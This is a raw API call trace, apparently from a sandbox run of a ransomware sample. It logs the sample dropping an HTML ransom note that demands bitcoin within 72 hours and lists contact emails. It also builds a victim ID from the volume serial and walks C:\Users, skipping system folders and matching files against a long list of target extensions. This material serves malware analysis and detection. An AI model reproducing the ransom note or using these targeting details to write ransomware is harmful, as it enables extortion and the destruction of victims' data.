	[0158.312] WriteFile (in: hFile=0xffffffff, lpBuffer=0x18d9b8, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18da94, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18da94, lpOverlapped=0x0) returned 0
	[0158.312] CloseHandle (hObject=0xffffffff) returned 1
	[0158.312] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.312] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.313] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0158.313] wsprintfW (in: param_1=0x18d770, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\System Volume Information\\HELP_DECRYPT_YOUR_FILES.HTML") returned 57
	[0158.313] CreateFileW (lpFileName="C:\\System Volume Information\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\system volume information\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0158.313] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0158.313] WriteFile (in: hFile=0xffffffff, lpBuffer=0x18cf64, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18da88, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18da88, lpOverlapped=0x0) returned 0
	[0158.314] CloseHandle (hObject=0xffffffff) returned 1
	[0158.314] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.314] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cf4c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cf4c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.315] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.315] GetUserNameA (in: lpBuffer=0x18ce30, pcbBuffer=0x18cf48 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cf48) returned 1
	[0158.330] wsprintfA (in: param_1=0x18d978, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.330] CreateFileW (lpFileName="C:\\System Volume Information\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\system volume information\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0158.336] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff
	[0158.336] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.336] WriteFile (in: hFile=0xffffffff, lpBuffer=0x18d978, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18da90, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18da90, lpOverlapped=0x0) returned 0
	[0158.336] CloseHandle (hObject=0xffffffff) returned 1
	[0158.336] FindFirstFileW (in: lpFileName="C:\\System Volume Information\\*.*" (normalized: "c:\\system volume information\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x5feba6e9, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5feba6e9, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsRE", cAlternateFileName="WINDOW~1")) returned 0xffffffff
	[0158.337] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0158.337] FindNextFileW (in: hFindFile=0xfb9b70, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="Users", cAlternateFileName="")) returned 1
	[0158.338] lstrcmpW (lpString1="Users", lpString2="..") returned 1
	[0158.338] lstrcmpW (lpString1="Users", lpString2=".") returned 1
	[0158.339] lstrcpyW (in: lpString1=0x18e9cc, lpString2="C:" | out: lpString1="C:") returned="C:"
	[0158.339] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\"
	[0158.339] lstrcatW (in: lpString1="C:\\", lpString2="Users" | out: lpString1="C:\\Users") returned="C:\\Users"
	[0158.339] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users"
	[0158.339] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\"
	[0158.339] lstrcpyW (in: lpString1=0x18dab4, lpString2="C:\\Users\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\"
	[0158.339] lstrcatW (in: lpString1="C:\\Users\\", lpString2="*.*" | out: lpString1="C:\\Users\\*.*") returned="C:\\Users\\*.*"
	[0158.339] FindFirstFileW (in: lpFileName="C:\\Users\\*.*" (normalized: "c:\\users\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x777cb379, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0158.340] lstrlenW (lpString="C:\\Users\\*.*") returned 12
	[0158.340] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.340] CharLowerBuffW (in: lpsz="C:\\Users\\*.*", cchLength=0xc | out: lpsz="c:\\users\\*.*") returned 0xc
	[0158.340] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.341] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="windows") returned 0x0
	[0158.341] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.341] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="boot") returned 0x0
	[0158.341] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.341] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="system volume information") returned 0x0
	[0158.341] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.342] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0158.342] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.342] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="temp") returned 0x0
	[0158.342] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.342] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="program files") returned 0x0
	[0158.342] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.342] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="program files (x86)") returned 0x0
	[0158.343] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.343] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="appdata") returned 0x0
	[0158.343] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.343] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="application data") returned 0x0
	[0158.343] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.343] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="winnt") returned 0x0
	[0158.343] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.344] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="tmp") returned 0x0
	[0158.344] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.344] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="cache") returned 0x0
	[0158.344] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.344] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="temporary internet files") returned 0x0
	[0158.344] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.345] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="webcache") returned 0x0
	[0158.345] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.345] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="inetcache") returned 0x0
	[0158.345] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.345] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="nvidia") returned 0x0
	[0158.345] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.346] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="packages") returned 0x0
	[0158.346] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.346] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="cookies") returned 0x0
	[0158.346] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.346] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="programdata") returned 0x0
	[0158.346] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x777cb379, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0158.346] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x4f6643a1, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x4f6643a1, ftLastAccessTime.dwHighDateTime=0x1d112ea, ftLastWriteTime.dwLowDateTime=0x4f6643a1, ftLastWriteTime.dwHighDateTime=0x1d112ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1
	[0158.347] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1
	[0158.347] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x4f6643a1, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x4f6643a1, ftLastAccessTime.dwHighDateTime=0x1d112ea, ftLastWriteTime.dwLowDateTime=0x4f6643a1, ftLastWriteTime.dwHighDateTime=0x1d112ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1
	[0158.347] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3757c8c, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x973af366, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x973af366, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0158.347] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0158.347] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0158.347] lstrcpyW (in: lpString1=0x18e524, lpString2="C:\\Users\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\"
	[0158.347] lstrcatW (in: lpString1="C:\\Users\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\desktop.ini") returned="C:\\Users\\desktop.ini"
	[0158.347] lstrlenW (lpString="C:\\Users\\desktop.ini") returned 20
	[0158.348] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.348] CharLowerBuffW (in: lpsz="C:\\Users\\desktop.ini", cchLength=0x14 | out: lpsz="c:\\users\\desktop.ini") returned 0x14
	[0158.348] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.348] StrStrW (lpFirst="c:\\users\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0158.348] lstrcpyW (in: lpString1=0x18e0cc, lpString2="c:\\users\\desktop.ini" | out: lpString1="c:\\users\\desktop.ini") returned="c:\\users\\desktop.ini"
	[0158.348] lstrlenW (lpString="c:\\users\\desktop.ini") returned 20
	[0158.348] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.349] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.349] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0158.349] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.349] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0158.350] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x777cb379, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x777cb379, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x777cb379, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0158.350] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2="..") returned 1
	[0158.350] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2=".") returned 1
	[0158.350] lstrcpyW (in: lpString1=0x18e524, lpString2="C:\\Users\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\"
	[0158.350] lstrcatW (in: lpString1="C:\\Users\\", lpString2="HELP_DECRYPT_YOUR_FILES.HTML" | out: lpString1="C:\\Users\\HELP_DECRYPT_YOUR_FILES.HTML") returned="C:\\Users\\HELP_DECRYPT_YOUR_FILES.HTML"
	[0158.350] lstrlenW (lpString="C:\\Users\\HELP_DECRYPT_YOUR_FILES.HTML") returned 37
	[0158.350] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.351] CharLowerBuffW (in: lpsz="C:\\Users\\HELP_DECRYPT_YOUR_FILES.HTML", cchLength=0x25 | out: lpsz="c:\\users\\help_decrypt_your_files.html") returned 0x25
	[0158.351] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.351] StrStrW (lpFirst="c:\\users\\help_decrypt_your_files.html", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.html"
	[0158.351] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x777a50ef, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x777a50ef, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x777a50ef, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0158.351] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2="..") returned 1
	[0158.351] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2=".") returned 1
	[0158.351] lstrcpyW (in: lpString1=0x18e524, lpString2="C:\\Users\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\"
	[0158.351] lstrcatW (in: lpString1="C:\\Users\\", lpString2="HELP_DECRYPT_YOUR_FILES.TXT" | out: lpString1="C:\\Users\\HELP_DECRYPT_YOUR_FILES.TXT") returned="C:\\Users\\HELP_DECRYPT_YOUR_FILES.TXT"
	[0158.352] lstrlenW (lpString="C:\\Users\\HELP_DECRYPT_YOUR_FILES.TXT") returned 36
	[0158.352] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.352] CharLowerBuffW (in: lpsz="C:\\Users\\HELP_DECRYPT_YOUR_FILES.TXT", cchLength=0x24 | out: lpsz="c:\\users\\help_decrypt_your_files.txt") returned 0x24
	[0158.352] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.352] StrStrW (lpFirst="c:\\users\\help_decrypt_your_files.txt", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.txt"
